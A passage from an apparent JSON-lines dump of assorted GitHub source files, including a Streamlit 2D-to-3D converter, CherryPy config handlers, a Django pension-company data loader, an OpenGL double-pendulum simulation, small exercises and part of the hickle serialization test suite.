os.path.join('cam_matrix/cameraIntrinsic_apple.xml')\ncloud_save_dir = \"./point_clouds\"\n\nst.title('DDP-1: 2D to 3D converter')\n\ndef handle_submit():\n st.session_state.submit = True\n\ndef handle_upload():\n if 'upl_names' not in st.session_state:\n st.session_state.upl_names = [st.session_state.upl]\n else:\n st.session_state.upl_names.append(st.session_state.upl)\n\n# page = st.sidebar.selectbox('Page Navigation', [\"3D model estimation\", \"Under the hood\"])\n\n# st.sidebar.markdown(\"\"\"---\"\"\")\nst.sidebar.write(\"Created by [RA Keerthan](https://github.com/keerthan2)\")\nst.sidebar.image(\"static/logo.png\", width=100)\n\nst.markdown(\"Select input RGB Image\")\nupload_columns = st.columns([2, 1])\nfile_upload = upload_columns[0].expander(label=\"Upload a RGB image\")\nuploaded_file = file_upload.file_uploader(\"Choose a RGB image\", type=['jpg','png','jpeg'], key='upl', on_change=handle_upload)\n\nif uploaded_file is not None:\n save_file_path = save_uploaded_file(uploaded_file)\n if save_file_path is not None: \n display_image = Image.open(uploaded_file)\n st.info(\"This image appears to be valid :ballot_box_with_check:\")\n upload_columns[1].image(display_image)\n submit_button = upload_columns[1].button(\"Run 3D model generation\", on_click = handle_submit)\n st.markdown(\"\"\"---\"\"\")\n else:\n st.error(\"This image appears to be invalid :no_entry_sign:\")\n\nif ('upl_names' in st.session_state) and (len(st.session_state.upl_names) > 1):\n if st.session_state.upl_names[-1]!=None and st.session_state.upl_names[-2]!=None:\n output = st.empty()\n with st_capture(output.code):\n print('1.1.1',st.session_state['upl_names'])\n if st.session_state.upl_names[-1].id == st.session_state.upl_names[-2].id:\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{st.session_state.upl_names[-1].name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\n else:\n st.session_state.upl_names = [st.session_state.upl_names[-1]]\n # except:\n # output = st.empty()\n # with st_capture(output.code):\n # print('1.1.2',st.session_state['upl_names'])\n # st.session_state.upl_names = [st.session_state.upl_names[-1]]\n else:\n st.session_state.upl_names = st.session_state.upl_names[1:]\n if 'submit' in st.session_state:\n output = st.empty()\n with st_capture(output.code):\n print('1.2',st.session_state['upl_names'])\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{st.session_state.upl_names[-1].name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\nelse:\n if 'submit' in st.session_state:\n output = st.empty()\n with st_capture(output.code):\n print('2',st.session_state['upl_names'])\n with st.spinner(text=\"Fetching the 3D model...\"):\n img_path = save_file_path\n depth_calibration_pipeline = predict(img_path, depth_save_dir,\n segmentation_model_path = segmentation_model_path, \n depth_model_base_path = depth_model_base_path,\n cam_mat_save_path = cam_mat_save_path,\n cloud_save_dir = cloud_save_dir)\n pcd_file_name = f\"{uploaded_file.name.split('.')[0]}.ply\"\n pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n with open(pcd_path, 'rb') as f:\n st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\nif 'submit' in st.session_state:\n output = st.empty()\n with st_capture(output.code):\n print('3',st.session_state['upl_names'])\n# if 'submit' in st.session_state:\n# with st.spinner(text=\"Fetching the 3D model...\"):\n# img_path = save_file_path\n# depth_calibration_pipeline = predict(img_path, depth_save_dir,\n# segmentation_model_path = segmentation_model_path, \n# depth_model_base_path = depth_model_base_path,\n# cam_mat_save_path = cam_mat_save_path,\n# cloud_save_dir = cloud_save_dir)\n# pcd_file_name = f\"{uploaded_file.name.split('.')[0]}.ply\"\n# pcd_path = os.path.join(cloud_save_dir, pcd_file_name)\n# with open(pcd_path, 'rb') as f:\n# st.download_button(label = 'Download 3D Model', data = f, file_name=pcd_file_name)\n\n","repo_name":"keerthan2/Virtual_Volume_Estimation","sub_path":"dashboard_test.py","file_name":"dashboard_test.py","file_ext":"py","file_size_in_byte":6755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39588481514","text":"def hola(nombre=\"Mundo\"):\n print(\"Hola\",nombre)\n\nhola(\"Cookie\")\nhola()\n\nclass animal:\n def __init__(self, patas=4, tipo=\"pequeño\"):\n self.patas=patas\n self.tipo=tipo\nclass perro(animal):\n def __init__(self, nombre = \"Oddie\", raza = \"Jack\"):\n self.nombre = nombre\n self.raza = raza\n #referencia a clase padre\n# def saludo(self):\n# return \"Te saluda %s\" % self.nombre\n\nperrito = perro(nombre=\"Lucas\", raza=\"jack\")\nperrito_hanz = perro()\nprint(perrito.nombre)\nprint(perrito.raza)\n#print(perrito.tipo)\n#print(perrito.patas)\n#perrito.saludo\nprint(perrito_hanz.nombre)\nprint(perrito_hanz.raza)\n#perrito_hanz.saludo","repo_name":"cmgcookie/scripts","sub_path":"ejercicios/funciones.py","file_name":"funciones.py","file_ext":"py","file_size_in_byte":664,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"43968159353","text":"import alt_path\nfrom header import *\n\nclass Host_config:\n\n def __init__(self, root):\n\n self.root = root\n\n self.task = Task(root)\n self.msgs = Msgs(root)\n self.resources = Resources(root)\n\nclass Task:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def list(self):\n\n db = cherrypy.thread_data.db\n tasks = db.sql(\"select * from tasks t where t.status!='DELETED' order by t.project, t.name\")\n\n return self.root.render('host/config/task/list', tasks=tasks)\n\n @cherrypy.expose\n def edit(self, task_id, _form=None, type=None):\n\n db = cherrypy.thread_data.db\n error = None\n\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n if task_id=='new':\n if db.sql(\"select * from tasks where name=%s and status!='DELETED'\", _form.name):\n error = 'Task name exists'\n if not _form.name:\n error = 'Empty name'\n if not _form.project:\n error = 'Empty project'\n if not error:\n task = dict_(\n type = _form.type.upper(),\n name = _form.name,\n project = _form.project,\n priority = int(_form.priority),\n n_fatals = int(_form.n_fatals)\n )\n if task.type=='PERIODIC':\n task.period = int(_form.period)\n if task.type=='EVENT':\n task.n_runs = int(_form.n_runs)\n if task_id=='new':\n cmd = 'NEW_TASK'\n else:\n cmd = 'EDIT_TASK'\n task.task_id = task_id\n self.root.host.cmd_save(cmd, task)\n url = self.root.cfg.root_url + '/host/config/task/list/'\n raise cherrypy.HTTPRedirect(url)\n\n if cherrypy.request.method=='GET' or error:\n if task_id!='new':\n task = db.sql(\"select * from tasks where task_id=%s\", task_id)[0]\n else:\n task = dict_(type=type)\n if not error:\n _form = task\n return self.root.render('host/config/task/edit_' + task.type.lower(), _form=_form,\n error=error, task_id=task_id, task=task, type=type)\n\nclass Msgs:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def edit(self, _form=None):\n\n db = cherrypy.thread_data.db\n error = None\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n for i, line in enumerate(_form.text.split('\\n')):\n if not line.strip():\n continue\n m = re.match('([+-] *(.+?) *(.+?) *\\\"(.+?)\\\" *(.*))', line)\n if not m:\n error = 'Wrong format in line %s' % (i+1)\n if not error:\n self.root.host.cmd('SET_CFG_MSG', dict_(text=_form.text))\n raise cherrypy.HTTPRedirect('/config/msgs/')\n\n if cherrypy.request.method=='GET' or error:\n if not error:\n sql = \"select value from values where name='cfg_msgs'\"\n text = db.sql(sql)[0].value\n _form = dict_(text=text)\n return self.root.render('/host/config/msgs/edit', _form=_form,\n error=error)\n\nclass Resources:\n\n def __init__(self, root):\n\n self.root = root\n\n @cherrypy.expose\n def edit(self, _form=None):\n\n db = cherrypy.thread_data.db\n error = None\n if cherrypy.request.method=='POST':\n self.root.auth('admin')\n _form = www.form.prepare_form(_form)\n try:\n resources = json.loads(_form.text)\n except:\n error = 'Bad json'\n if not error:\n print(resources)\n self.root.host.cmd_save('SET_HOST_RESOURCES', dict_(text=_form.text))\n raise cherrypy.HTTPRedirect('')\n\n if cherrypy.request.method=='GET' or error:\n if not error:\n sql = \"select value from values where name='cfg_resources'\"\n text = db.sql(sql, return_one=True).value\n _form = dict_(text=text)\n return self.root.render('/host/config/resources/edit', _form=_form,\n error=error)\n\n","repo_name":"altyntsev/alt_proc","sub_path":"2018-10-23-alt_proc_control/main/host_config.py","file_name":"host_config.py","file_ext":"py","file_size_in_byte":4565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"41048812638","text":"class DiffOENode:\r\n def __init__(self, data):\r\n self.data = data\r\n self.left = None\r\n self.right = None\r\n\r\n\r\ndef dif(roo):\r\n if roo is None:\r\n return 0\r\n\r\n a = [roo]\r\n odele = 0\r\n evie = 0\r\n level = 0\r\n\r\n while len(a):\r\n s = len(a)\r\n level += 1\r\n while s > 0:\r\n current = a[0]\r\n a.pop(0)\r\n if level % 2 == 0:\r\n evie += current.data\r\n else:\r\n odele += current.data\r\n\r\n if current.left:\r\n a.append(current.left)\r\n if current.right:\r\n a.append(current.right)\r\n s -= 1\r\n return odele - evie\r\n\r\n\r\nroot = DiffOENode(1)\r\nroot.left = DiffOENode(2)\r\nroot.right = DiffOENode(3)\r\nroot.left.left = DiffOENode(4)\r\nroot.right.left = DiffOENode(5)\r\nroot.right.right = DiffOENode(6)\r\nprint(dif(root))\r\n","repo_name":"sathya0803/MyPythonCode","sub_path":"Tr3.py","file_name":"Tr3.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40000393140","text":"from django.conf import settings \n\nimport os\nimport csv\nimport requests\nfrom xml.etree import ElementTree as elemTree\nfrom difflib import SequenceMatcher\nfrom datetime import datetime\n\nfrom .models import PensionCompany\n\nfrom .dump import DUMP\n\nDOWNLOAD_FILENAME = 'pension_company.csv'\nAPI_DEV_MODE = settings.API_DEV_MODE\nAPI_URL = 'http://apis.data.go.kr/B552015/NpsBplcInfoInqireService/getBassInfoSearch'\nMAX_RESULT_SIZE = 100000\n\ndef similar(a: str, b: str):\n return SequenceMatcher(None, a, b).ratio()\n\n\ndef get_openapi_result(registration_number: str, keyword: str):\n params = {\n 'serviceKey': settings.SERVICE_KEY,\n 'wkpl_nm': keyword,\n 'bzowr_rgst_no': str(registration_number),\n 'numOfRows': MAX_RESULT_SIZE,\n }\n\n response = requests.get(API_URL, params=params)\n \n return response.text\n\n\ndef parse_openapi_result(text: str):\n items = elemTree.fromstring(text).find('body').find('items')\n \n result = []\n for item in items.iter('item'):\n dic = {}\n dic['name'] = item.find('wkplNm').text\n dic['registration_number'] = item.find('bzowrRgstNo').text\n dic['address'] = item.find('wkplRoadNmDtlAddr').text\n dic['created_at'] = item.find('dataCrtYm').text\n dic['seq'] = item.find('seq').text\n\n result.append([*dic.items()])\n\n return result\n\ndef parse_registration_number(registration_number: str):\n return registration_number.replace('-', '')\n\ndef parse_registration_name(registration_name: str):\n return registration_name.replace('주식회사', '').replace('(주)', '')\n\ndef get_similar_company_list_by_registration(registration_name: str, registration_number: str, keyword):\n registration_name = registration_name.strip()\n registration_number = registration_number.strip()\n keyword = (keyword or \"\").strip()\n\n registration_number = parse_registration_number(registration_number)\n result = DUMP if API_DEV_MODE else parse_openapi_result(get_openapi_result(registration_number[:6], keyword)) \n result.sort(key = lambda t: (-similar(t[0][1], registration_name), -int(t[4][1])))\n \n return result\n\ndef get_similar_company_list_by_registration_from_pension_company(registration_name: str, registration_number: str, keyword):\n registration_name = registration_name.strip()\n registration_number = registration_number.strip()\n keyword = (keyword or \"\").strip()\n \n registration_number = parse_registration_number(registration_number)[:6]\n \n result = [*PensionCompany.objects.filter(registration_number = registration_number).values(\n 'name',\n 'registration_number',\n 'lot_number_address',\n 'road_name_address',\n 'employees_count',\n 'data_created_at',\n )]\n \n result.sort(key = lambda t: (-similar(t['name'], registration_name), -datetime(int(t['data_created_at'][:4]), int(t['data_created_at'][5:]), 1).timestamp()))\n\n result = [item.items() for item in result]\n\n return result\n\ndef download_company_csv():\n print(\"File Download Start!\")\n \n try:\n with open(DOWNLOAD_FILENAME, 'wb') as file:\n response = requests.get(\"https://www.data.go.kr/catalog/15083277/fileData.json\")\n csv_url = response.json()['distribution'][0]['contentUrl']\n \n print(f\"{csv_url}에서 다운받고 있습니다.\")\n\n response = requests.get(csv_url)\n file.write(response.content)\n except Exception as err:\n print(\"File Download Error\", err)\n return False\n\n print(\"File Download Complete!\") \n return True\n\n\n# ['자료생성년월', ' 사업장명', ' 사업자등록번호', ' 사업장가입상태코드 1 등록 2 탈퇴', ' 우편번호', ' 사업장지번상세주소', ' 사업장도로명상세주소', ' 고객법정동주소코드', ' 고객행정동주소코드', ' 법정동주소광역시도코드', ' 법정동주소광역시시군구코드', ' 법정동주소광역시시군구읍면동코드', ' 사업장형태구분코드 1 법인 2 개인', ' 사업장업종코드', ' 사업장업종코드명', ' 적용일자', ' 재등록일자', ' 탈퇴일자', ' 가입자수', ' 당월고지금액', ' 신규취득자수', ' 상실가입자수']\ndef update_pension_company():\n with open(DOWNLOAD_FILENAME, 'r', encoding='cp949') as file:\n csv_file = csv.reader(file)\n \n bulk_pension_companies = []\n \n print(\"Pension Company Data Reload Start!\")\n \n for idx, row in enumerate(csv_file):\n if idx == 0:\n continue\n\n pension_company = PensionCompany(\n name = row[1],\n registration_number = row[2],\n lot_number_address = row[5],\n road_name_address = row[6],\n employees_count = row[18],\n data_created_at = row[0],\n )\n \n bulk_pension_companies.append(pension_company)\n \n PensionCompany.objects.all().delete()\n PensionCompany.objects.bulk_create(bulk_pension_companies, 400)\n\n print(\"Pension Company Data Reload Complete!\")\n\n\ndef delete_csv_file():\n os.remove(DOWNLOAD_FILENAME)\n\n\ndef reload_pension_company():\n if download_company_csv():\n update_pension_company()\n delete_csv_file()\n","repo_name":"shinkeonkim/paeon","sub_path":"main/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"2823016727","text":"import numpy as np\nimport glfw\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom random import random\n\ndef render(th1, th2, camAng):\n\n\tglPolygonMode( GL_FRONT_AND_BACK, GL_LINE )\n# enable depth test\n\tglClear(GL_COLOR_BUFFER_BIT | GL_DEPTH_BUFFER_BIT)\n\tglEnable(GL_DEPTH_TEST)\n\tglLoadIdentity()\n\n# orthogonal projection\n\tglOrtho(-1, 1, -1, 1, -3, 3)\n# rotate camera position\n\tgluLookAt(.2*np.sin(camAng), .1,.2*np.cos(camAng), 0, 0, 0, 0, 1, 0)\n\n# draw cooridnate\n\tglBegin(GL_LINES)\n\tglColor3ub(255, 0, 0)\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([1.,0.,0.]))\n\tglColor3ub(0, 255, 0)\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([0.,1.,0.]))\n\tglColor3ub(0, 0, 255)\n\t# aligning with pendulum path\n\tglVertex3fv(np.array([0.,0.,0.]))\n\tglVertex3fv(np.array([-1.,0.,0.]))\n\tglEnd()\n\n\n\n\n\t# start drawing pendulum\n\t\n\t#-------\n\t# LAYER1\n\tglPushMatrix()\n\n\t#-------\n\t# LAYER2\n\tglPushMatrix()\n\n\tglColor3ub(255, 0, 0)\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\n\t# first ball\n\tdrawSphere()\n\tglPopMatrix()\n\tglTranslatef(0.3*np.sin(th1), -0.3*np.cos(th1), 0)\n\n\t#-------\n\t# LAYER2\n\tglPushMatrix()\n\tglTranslatef(0.3*np.sin(th1), -0.3*np.cos(th1), 0)\n\n\t#-------\n\t# LAYER3\n\tglPushMatrix()\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\t# second ball\n\tdrawSphere()\n\tglPopMatrix()\n\n\t\n\tglTranslatef(0.3*np.sin(th1+th2), -0.3*np.cos(th1+th2), 0)\n\n\t#-------\n\t# LAYER3\n\tglPushMatrix()\n\tglTranslatef(0.3*np.sin(th1+th2), -0.3*np.cos(th1+th2), 0)\n\tglScalef(.05, .05, .05)\n\tglColor3ub(255, 0, 0)\n\t# third ball\n\tdrawSphere()\n\tglPopMatrix()\n\n\tglRotatef(((th2+th1)*180/np.pi) % 360, 0, 0, 1)\n\tglColor3ub(0, 255, 0)\n\t# green cube\n\tglScalef(0.2, 2, 0.2)\n\tdrawCube()\n\n\tglPopMatrix()\n\n\n\tglRotatef((th1*180/np.pi) % 360, 0, 0, 1)\n\tglColor3ub(0, 0, 255)\n\t# blue cube\n\tglScalef(0.2, 2, 0.2)\n\tdrawCube()\n\n\tglPopMatrix()\n\n\n\n\n# numerically compuing double pendulum with Runge-Kutta method\ndef runge_kutta(yin, h):\n\tyout = [0]*4\n\tyt = [0]*4\n\tk = np.zeros((4, 4))\n\n\n\tdydx = derivatives(yin)\n\tfor i in range(4):\n\t\tk[0][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + 0.5*k[0][i]\n\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[1][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + 0.5*k[1][i]\n\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[2][i] = h*dydx[i]\n\t\tyt[i] = yin[i] + k[2][i]\n\n\tdydx = derivatives(yt)\n\tfor i in range(4):\n\t\tk[3][i] = h*dydx[i]\n\t\tyout[i] = yin[i] + k[0][i]/6. + k[1][i]/3. + k[2][i]/3. + k[3][i]/6.\n\n\treturn yout\n\n\ndef derivatives(yin):\n\t# masses and lengths of the pendulum, gravity constant\n\tM1 = 1.2\n\tM2 = 1.0\n\tL1 = 1.0\n\tL2 = 1.0\n\tG = 9.8\n\t\n\tdydx = [0]*4\n\tdydx[0] = yin[1]\n\n\tdel_ = yin[2]-yin[0]\n\tden1 = (M1+M2)*L1 - M2*L1*np.cos(del_)*np.cos(del_);\n\tdydx[1] = (M2*L1*yin[1]*yin[1]*np.sin(del_)*np.cos(del_)\n \t\t+ M2*G*np.sin(yin[2])*np.cos(del_) + M2*L2*yin[3]*yin[3]*np.sin(del_)\n \t\t- (M1+M2)*G*np.sin(yin[0]))/den1\t\n\t\n\tdydx[2] = yin[3]\n\n\tden2 = (L2/L1)*den1\n\tdydx[3] = (-M2*L2*yin[3]*yin[3]*np.sin(del_)*np.cos(del_)\n \t\t+ (M1+M2)*G*np.sin(yin[0])*np.cos(del_) \n \t\t- (M1+M2)*L1*yin[1]*yin[1]*np.sin(del_)\n \t\t- (M1+M2)*G*np.sin(yin[2]))/den2\n\n\treturn dydx\n\n\ndef drawCube():\n\tglBegin(GL_QUADS)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f(-0.1, 0.1, 0.1)\n\tglVertex3f(-0.1, 0.1,-0.1)\n\tglVertex3f(-0.1,-0.1,-0.1)\n\tglVertex3f(-0.1,-0.1, 0.1)\n\tglVertex3f( 0.1, 0.1,-0.1)\n\tglVertex3f( 0.1, 0.1, 0.1)\n\tglVertex3f( 0.1,-0.1, 0.1)\n\tglVertex3f( 0.1,-0.1,-0.1)\n\tglEnd()\n\n\n# draw a sphere of radius 1, centered at the origin.\n# numLats: number of latitude segments (horizontal)\n# numLongs: number of longitude segments (horizontal)\ndef drawSphere(numLats=12, numLongs=12):\n\tfor i in range(0, numLats + 1):\n\t\tlat0 = np.pi * (-0.5 + float(float(i - 1) / float(numLats)))\n\t\tz0 = np.sin(lat0)\n\t\tzr0 = np.cos(lat0)\n\t\tlat1 = np.pi * (-0.5 + float(float(i) / float(numLats)))\n\t\tz1 = np.sin(lat1)\n\t\tzr1 = np.cos(lat1)\n\t\t# Use Quad strips to draw the sphere\n\t\tglBegin(GL_QUAD_STRIP)\n\t\tfor j in range(0, numLongs + 1):\n\t\t\tlng = 2 * np.pi * float(float(j - 1) / float(numLongs))\n\t\t\tx = np.cos(lng)\n\t\t\ty = np.sin(lng)\n\t\t\tglVertex3f(x * zr0, y * zr0, z0)\n\t\t\tglVertex3f(x * zr1, y * zr1, z1)\n\t\tglEnd()\n\n\ndef key_callback(window, key, scancode, action, mods):\n\tglobal camAng\n\tif action==glfw.PRESS or action==glfw.REPEAT:\n\t\tif key==glfw.KEY_3:\n\t\t\tcamAng += np.radians(5)\n\t\tif key==glfw.KEY_1:\n\t\t\tcamAng -= np.radians(5)\n\n\n\ndef main():\n\tglobal camAng\n\n\tif not glfw.init():\n\t\treturn\n\twindow = glfw.create_window(700,700,\"2014001303\", None,None)\n\tglfw.set_key_callback(window, key_callback)\n\tif not window:\n\t\tglfw.terminate()\n\t\treturn\n\tglfw.make_context_current(window)\n\n\tcamAng = 0\n\n\t# randomly generates location of the pendulum\n\tth1 = np.pi * random()\n\tth2 = np.pi * random()\n\tw1 = 0\n\tw2 = 0\n\twhile not glfw.window_should_close(window):\n\t\tglfw.poll_events()\n\n\t\trender(th1, th2, camAng)\n\t\t(th1, w1, th2, w2) = runge_kutta([th1, w1, th2, w2], 0.003)\n\t\tglfw.swap_buffers(window)\n\t\t\n\tglfw.terminate()\n\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"parkseobin/double_pendulum","sub_path":"PyOpenGL/doublependulum.py","file_name":"doublependulum.py","file_ext":"py","file_size_in_byte":5321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39125672316","text":"# 74. Search a 2D Matrix\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if not matrix:\n return False\n\n flatten_list = [temp for sublist in matrix for temp in sublist]\n\n start = 0\n end = len(flatten_list)-1\n\n while start <= end:\n middle = (start+end)//2\n\n if target == flatten_list[middle]: return True\n elif target > flatten_list[middle]: start = middle +1\n else: end = middle-1\n\n return False\n","repo_name":"raviarrow88/Python-coding","sub_path":"leetcode/lp-74.py","file_name":"lp-74.py","file_ext":"py","file_size_in_byte":536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32677454558","text":"#! /usr/bin/env python\n# encoding: utf-8\n\"\"\"\n# test_hickle.py\n\nUnit test for hickle package.\n\n\"\"\"\n\n\n# %% IMPORTS\n\n# Built-in imports\nfrom collections import OrderedDict as odict\nimport os\nimport re\nfrom pprint import pprint\nimport pickle\n\n\n# Package imports\nimport numpy as np\nfrom py.path import local\nimport pytest\n\n# hickle imports\nfrom hickle import dump, hickle, load, lookup\n\n# Set current working directory to the temporary directory\nlocal.get_temproot().chdir()\n\n\n# %% GLOBALS\nNESTED_DICT = {\n \"level1_1\": {\n \"level2_1\": [1, 2, 3],\n \"level2_2\": [4, 5, 6]\n },\n \"level1_2\": {\n \"level2_1\": [1, 2, 3],\n \"level2_2\": [4, 5, 6]\n },\n \"level1_3\": {\n \"level2_1\": {\n \"level3_1\": [1, 2, 3],\n \"level3_2\": [4, 5, 6]\n },\n \"level2_2\": [4, 5, 6]\n }\n}\n\n\n# %% FIXTURES\n \n@pytest.fixture\ndef test_file_name(request):\n \"\"\"\n create test dependent filename path string\n \"\"\"\n yield \"{}.hkl\".format(request.function.__name__)\n\n\n# %% HELPER DEFINITIONS\n\n# Define a test function that must be serialized and unpacked again\ndef func(a, b, c=0):\n \"\"\" just something to do \"\"\"\n return(a, b, c)\n\n# the following is required as package name of with_state is hickle\n# and load_loader refuses load any loader module for classes defined inside\n# hickle package exempt when defined within load_*.py loaders modules.\n# That has to be done by hickle sub modules directly using register_class function\npickle_dumps = pickle.dumps\npickle_loads = pickle.loads\n\ntypes_to_hide = set() \n\ndef make_visible_to_dumps(obj,protocol=None,*,fix_imports=True):\n \"\"\"\n simulate loader functions defined outside hickle package\n \"\"\"\n if obj in types_to_hide:\n obj.__module__ = re.sub(r'^\\s*(?!hickle\\.)','hickle.',obj.__module__)\n elif obj.__class__ in types_to_hide:\n obj.__class__.__module__ = re.sub(r'^\\s*(?!hickle\\.)','hickle.',obj.__class__.__module__)\n return pickle_dumps(obj,protocol,fix_imports=fix_imports)\n\ndef hide_from_hickle(bytes_obj,*,fix_imports=True,encoding=\"ASCII\",errors=\"strict\"):\n \"\"\"\n simulate loader function defined outside hickle package\n \"\"\"\n obj = pickle_loads(bytes_obj,fix_imports = fix_imports, encoding = encoding, errors = errors)\n if obj in types_to_hide:\n obj.__module__ = re.sub(r'^\\s*hickle\\.','',obj.__module__)\n elif obj.__class__ in types_to_hide:\n obj.__class__.__module__ = re.sub(r'^\\s*hickle\\.','',obj.__class__.__module__)\n return obj\n\n# Define a class that must always be pickled\nclass with_state(object):\n \"\"\"\n A class that always must be handled by create_pickled_dataset\n \"\"\"\n def __init__(self):\n self.a = 12\n self.b = {\n 'love': np.ones([12, 7]),\n 'hatred': np.zeros([4, 9])}\n\n def __getstate__(self):\n self.a *= 2\n return({\n 'a': self.a,\n 'b': self.b})\n\n def __setstate__(self, state):\n self.a = state['a']\n self.b = state['b']\n\n def __getitem__(self, index):\n if(index == 0):\n return(self.a)\n if(index < 2):\n return(self.b['hatred'])\n if(index > 2):\n raise ValueError(\"index unknown\")\n return(self.b['love'])\n\ntypes_to_hide.add(with_state)\n\n# %% FUNCTION DEFINITIONS\ndef test_invalid_file():\n \"\"\" Test if trying to use a non-file object fails. \"\"\"\n\n with pytest.raises(hickle.FileError):\n dump('test', ())\n\n\ndef test_state_obj(monkeypatch,test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a class object with pickle states\n\n https://github.com/telegraphic/hickle/issues/125\"\"\"\n\n with monkeypatch.context() as monkey:\n monkey.setattr(with_state,'__module__',re.sub(r'^\\s*hickle\\.','',with_state.__module__))\n monkey.setattr(pickle,'dumps',make_visible_to_dumps)\n mode = 'w'\n obj = with_state()\n with pytest.warns(lookup.SerializedWarning):\n dump(obj, test_file_name, mode,**compression_kwargs)\n monkey.setattr(pickle,'loads',hide_from_hickle)\n obj_hkl = load(test_file_name)\n assert isinstance(obj,obj_hkl.__class__) or isinstance(obj_hkl,obj.__class__)\n assert np.allclose(obj[1], obj_hkl[1])\n\n\ndef test_local_func(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a local function\n\n https://github.com/telegraphic/hickle/issues/119\"\"\"\n\n mode = 'w'\n with pytest.warns(lookup.SerializedWarning):\n dump(func, test_file_name, mode,**compression_kwargs)\n func_hkl = load(test_file_name)\n assert isinstance(func,func_hkl.__class__) or isinstance(func_hkl,func.__class__)\n assert func(1, 2) == func_hkl(1, 2)\n\n\ndef test_non_empty_group(test_file_name,compression_kwargs):\n \"\"\" Test if attempting to dump to a group with data fails \"\"\"\n\n hickle.dump(None, test_file_name,**compression_kwargs)\n with pytest.raises(ValueError):\n dump(None, test_file_name, 'r+',**compression_kwargs)\n\n\ndef test_string(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a string \"\"\"\n mode = 'w'\n string_obj = \"The quick brown fox jumps over the lazy dog\"\n dump(string_obj, test_file_name, mode,**compression_kwargs)\n string_hkl = load(test_file_name)\n assert isinstance(string_hkl, str)\n assert string_obj == string_hkl\n\n\ndef test_65bit_int(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading an integer with arbitrary precision\n\n https://github.com/telegraphic/hickle/issues/113\"\"\"\n i = 2**65-1\n dump(i, test_file_name,**compression_kwargs)\n i_hkl = load(test_file_name)\n assert i == i_hkl\n\n j = -2**63-1\n dump(j, test_file_name,**compression_kwargs)\n j_hkl = load(test_file_name)\n assert j == j_hkl\n\ndef test_list(test_file_name,compression_kwargs):\n \"\"\" Dumping and loading a list \"\"\"\n filename, mode = 'test_list.h5', 'w'\n list_obj = [1, 2, 3, 4, 5]\n dump(list_obj, test_file_name, mode=mode,**compression_kwargs)\n list_hkl = load(test_file_name)\n try:\n assert isinstance(list_hkl, list)\n assert list_obj == list_hkl\n import h5py\n a = h5py.File(test_file_name, 'r')\n a.close()\n\n except AssertionError:\n print(\"ERR:\", list_obj, list_hkl)\n import h5py\n\n raise\n\n\ndef test_set(test_file_name,compression_kwargs) :\n \"\"\" Dumping and loading a list \"\"\"\n mode = 'w'\n list_obj = set([1, 